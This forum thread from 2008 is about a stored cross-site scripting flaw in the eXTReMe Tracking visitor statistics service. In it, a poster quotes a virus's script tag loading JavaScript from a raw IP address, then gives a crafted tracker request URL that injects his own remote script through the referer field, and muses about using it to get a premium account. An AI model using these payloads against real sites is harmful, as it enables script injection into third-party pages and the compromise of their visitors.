Author | Post | |||
quangntenemy |
I use this one to track visitors coming to my blog. Recently there has been an evil Chinese virus roaming around freely, and I have been blogging about it. And many people have been coming to my blog via the Google query: <script src=http://121.15.220.104/1.js></script> which is the signature for the virus. Guess what? Today when I visited eXTReMe Tracking, I saw this nice ad: http://www.flickr.com/photos/22823442@N02/2195246062/ What happened? No, neither my comp nor any other computer arround was pwned by the virus. It was the tracker site that got pwned. For some weird reason it htmldecoded the referer string, and as a result the malicious script was inserted to the page. Now let's see if I can "forge" the referer to insert my own script to the page |
|||
15.01.2008 13:59:36 |
|
|||
alt3rn4tiv3 |
Haha. The ad writes "好消息", aka "good news" P.S. Forum is not asian-languages compatible. |
|||
Edited by alt3rn4tiv3 on 15.01.2008 14:15:20 | ||||
15.01.2008 14:14:43 |
|
|||
quangntenemy |
I finally managed to reproduce the XSS in a "nice" way First you need to request the page: http://e1.extreme-dm.com/s10.g?login=qpenguin&jv=y&j=y&srw=1024&srb=24&l=http%3A//www.google.com/search%3Fhl%3Den%26q%3D%3Cscript+src%3Dhttp%3A//quangntenemy.t35.com/lolxss.js%3E%3C/script%3E%26btnG%3DGoogle+Search Then wait for a few minutes and you'll see the xss here: http://extremetracking.com/open;ref1?login=qpenguin Screenshot: http://www.flickr.com/photos/22823442@N02/2194552167/ Now maybe I can use this to get a premium account. This type 2 XSS attack is surely the most dangerous one |
|||
Edited by quangntenemy on 18.01.2008 06:57:43 | ||||
15.01.2008 14:57:43 |
|
|||
unknown user |
jup that's pretty bad. |
|||
15.01.2008 15:41:10 |
|